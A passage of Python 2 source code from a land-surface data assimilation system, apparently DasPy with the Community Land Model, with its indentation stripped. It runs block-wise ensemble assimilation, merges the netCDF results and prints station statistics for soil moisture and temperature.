modules=("numpy", "netCDF4", "sys", "os", "re", "gc", "imp", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "signal", "gc", "imp", "getpass", "calendar", "glob","scipy.stats", 'scipy.weave'), group='Block_Assim'))
job_server_node_results_wise[Node_Index] = job_server_node_results[Block_Index]
Node_Status[Node_Index] = False
Block_Index = Block_Index + 1
if Block_Index >= len(active_nodes_server):
for job in job_server_node_results_wise:
if job != [] and job.finished:
Node_Index = job_server_node_results_wise.index(job)
print "*********************************************************************Node_Index",Node_Index,"is finished!"
Node_Status[Node_Index] = True
job_server_node_results_wise[Node_Index] = []
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else:
print "********* Run Block_Assim Sequentially"
if PDAF_Assim_Framework == 2:
DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_State, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Assim, Bias_Estimation_Option_Obs_Assim, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum,
Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis,
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, octave, r)
print "Write NC_File_Out_Assimilation_2_Initial.nc"
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r+')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r+')
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, :, :, :]
Prop_Grid_Array_Sys_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys_parm_infl'][:, :, :]
CLM_Soil_Moisture_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, :, :, :]
CLM_Soil_Moisture_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:, :, :]
CLM_Soil_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, :, :, :]
CLM_Vegetation_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:, :, :]
CLM_Ground_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][:, :, :]
CLM_Soil_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, :, :]
CLM_Vegetation_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][:, :]
CLM_Ground_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][:, :]
CLM_Surface_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Surface_Temperature_parm_infl'][:, :]
Innovation_State = NC_File_Out_Assimilation_2_Diagnostic.variables['Innovation_State'][:,:, :, :]
Increments_State = NC_File_Out_Assimilation_2_Diagnostic.variables['Increments_State'][:,:, :, :]
Observation = NC_File_Out_Assimilation_2_Diagnostic.variables['Observation'][:,:, :]
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
print "Block_Index",Block_Index
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
NC_FileName_Out_Block = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
NC_File_Out_Block = netCDF4.Dataset(NC_FileName_Out_Block, 'r')
Analysis_Grid[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid'][:,:]
Localization_Map_Mask[Prop_Grid_Array_Sys_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Localization_Map_Mask'][:,:]
Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Analysis_Grid_Array'][:,Prop_Grid_Array_Sys_Index,:,:]
Prop_Grid_Array_Sys_parm_infl[Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index,:,:]
CLM_Soil_Moisture_Ensemble_Mat[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Soil_Moisture_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Moisture_parm_infl[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Soil_Moisture_parm_infl'][:,:,:]
CLM_Soil_Temperature_Ensemble_Mat[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Soil_Temperature_Ensemble_Mat'][:,:,:,:]
CLM_Vegetation_Temperature_Ensemble_Mat[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:,:,:]
CLM_Ground_Temperature_Ensemble_Mat[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Ground_Temperature_Ensemble_Mat'][:,:,:]
CLM_Soil_Temperature_parm_infl[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Soil_Temperature_parm_infl'][:,:,:]
CLM_Vegetation_Temperature_parm_infl[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Vegetation_Temperature_parm_infl'][:,:]
CLM_Ground_Temperature_parm_infl[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Ground_Temperature_parm_infl'][:,:]
CLM_Surface_Temperature_parm_infl[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Surface_Temperature_parm_infl'][:,:]
Innovation_State[:,Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Innovation_State'][:,Prop_Grid_Array_Sys_Index,:,:]
Increments_State[:,Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Increments_State'][:,Prop_Grid_Array_Sys_Index,:,:]
Observation[:,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Observation'][:,:,:]
NC_File_Out_Block.close()
NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index, :, :] = Prop_Grid_Array_Sys_parm_infl[Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Moisture_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:, :, :] = CLM_Soil_Moisture_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Temperature_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:, :, :] = CLM_Vegetation_Temperature_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][:, :, :] = CLM_Ground_Temperature_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, :, :] = CLM_Soil_Temperature_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][:, :] = CLM_Vegetation_Temperature_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][:, :] = CLM_Ground_Temperature_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Surface_Temperature_parm_infl'][:, :] = CLM_Surface_Temperature_parm_infl
NC_File_Out_Assimilation_2_Diagnostic.variables['Innovation_State'][:,Prop_Grid_Array_Sys_Index, :, :] = Innovation_State[:,Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Diagnostic.variables['Increments_State'][:,Prop_Grid_Array_Sys_Index, :, :] = Increments_State[:,Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Diagnostic.variables['Observation'][:,:, :] = Observation
del Analysis_Grid_Array,Prop_Grid_Array_Sys_parm_infl,CLM_Soil_Moisture_Ensemble_Mat,CLM_Soil_Moisture_parm_infl
del CLM_Soil_Temperature_Ensemble_Mat,CLM_Vegetation_Temperature_Ensemble_Mat,CLM_Ground_Temperature_Ensemble_Mat
del CLM_Soil_Temperature_parm_infl,CLM_Vegetation_Temperature_parm_infl,CLM_Ground_Temperature_parm_infl
del CLM_Surface_Temperature_parm_infl,Innovation_State,Increments_State,Observation
NC_File_Out_Assimilation_2_Initial.sync()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Diagnostic.sync()
NC_File_Out_Assimilation_2_Diagnostic.close()
#--------------------------------Finish Assimilation
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
Observation_Matrix_Copy = Observation_Matrix[Observation_Matrix_Index,::]
Observation_Matrix_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, Observation_Matrix_Copy)
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid[Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], numpy.mean(NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0))
ObsModel_Mat_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, ObsModel_Mat)
NC_File_Out_Assimilation_2_Initial_Copy.close()
if Def_Print:
print "numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)",numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)
print "Min Observation Value is:", Observation_Matrix_Copy.min(), "Maximum Observation Value is:", Observation_Matrix_Copy.max()
print "Min Model_State Value is:", Model_State.min(), "Maximum Model_State Value is:", Model_State.max()
print "Min Analysis_Grid Value is:", Analysis_Grid_Temp.min(), "Maximum Analysis_Grid Value is:", Analysis_Grid_Temp.max()
print "Analysis Mean is:", numpy.mean(Analysis_Grid_Temp), "Model Ensemble Mean is:", numpy.mean(Model_State), "(Analysis - Model_State) Mean is:", numpy.mean(Analysis_Grid_Temp.flatten() - Model_State.flatten())
print "ObsModel_Mat Mean is:", numpy.mean(ObsModel_Mat_Copy),"Observation Mean is:", numpy.mean(Observation_Matrix_Copy), "(ObsModel_Mat - Observation) Mean is:", numpy.mean(ObsModel_Mat.flatten() - Observation_Matrix_Copy.flatten())
if Def_Print != 0:
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:,:,:,:]
CLM_Soil_Moisture_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:,:,:,:]
#CLM_Soil_Ice_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Ice_Ensemble_Mat'][:,:,:,:]
CLM_Vegetation_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:,:,:]
CLM_Ground_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][:,:,:]
#CLM_2m_Air_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_2m_Air_Temperature_Ensemble_Mat'][:,:,:]
#CLM_Snow_Depth_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Snow_Depth_Ensemble_Mat'][:,:,:]
#CLM_Snow_Water_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Snow_Water_Ensemble_Mat'][:,:,:]
#CLM_ROOTFR_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_ROOTFR_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Moisture_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:,:,:]
CLM_Soil_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:,:,:]
#CLM_Soil_Ice_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Ice_parm_infl'][:,:,:]
CLM_Vegetation_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][:,:]
CLM_Ground_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][:,:]
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
CLM_Soil_Moisture_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Moisture_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Temperature_Ensemble_Mat'][:,:,:,:]
#CLM_Soil_Ice_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Ice_Ensemble_Mat'][:,:,:,:]
CLM_Vegetation_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:,:,:]
CLM_Ground_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Ground_Temperature_Ensemble_Mat'][:,:,:]
#CLM_2m_Air_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_2m_Air_Temperature_Ensemble_Mat'][:,:,:]
#CLM_Snow_Depth_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Snow_Depth_Ensemble_Mat'][:,:,:]
#CLM_Snow_Water_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Snow_Water_Ensemble_Mat'][:,:,:]
#CLM_ROOTFR_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_ROOTFR_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Moisture_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Moisture_parm_infl'][:,:,:]
CLM_Soil_Temperature_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Temperature_parm_infl'][:,:,:]
#CLM_Soil_Ice_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Ice_parm_infl'][:,:,:]
CLM_Vegetation_Temperature_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Vegetation_Temperature_parm_infl'][:,:]
CLM_Ground_Temperature_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Ground_Temperature_parm_infl'][:,:]
NC_File_Out_Assimilation_2_Initial_Copy.close()
print "******************************************************** Station Statistics"
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
for Station_Index in range(numpy.size(Station_XY)/2):
print "Station_"+str(Station_Index+1),"Analysis:",Analysis_Grid_Temp[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Model Value:",Model_State[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Observation_Value:",Observation_Matrix_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
print "ObsModel_Variance:",ObsModel_Variance_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
#ObsModel_Mat = numpy.ma.masked_where(ObsModel_Mat == 0, ObsModel_Mat)
print "Ens_Index",Ens_Index,"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans
if Def_Print >= 2:
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
for Soil_Layer_Index in range(Soil_Layer_Num):
for Ens_Index in range(Ensemble_Number):
print "Soil_Layer_Index",Soil_Layer_Index,"Ens_Index",Ens_Index,"SysModel:",CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index],\
"Analysis:",CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index]
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "Soil_Layer_Index",Soil_Layer_Index,"Ens_Index",Ens_Index,"SysModel:",CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index],\
"Analysis:",CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index]
if (Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Soil_Moisture"):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "Vegetation_Temperature","Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
print "Ground_Temperature","Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Vegetation_Temperature","Model_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
print "Ground_Temperature","Model_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
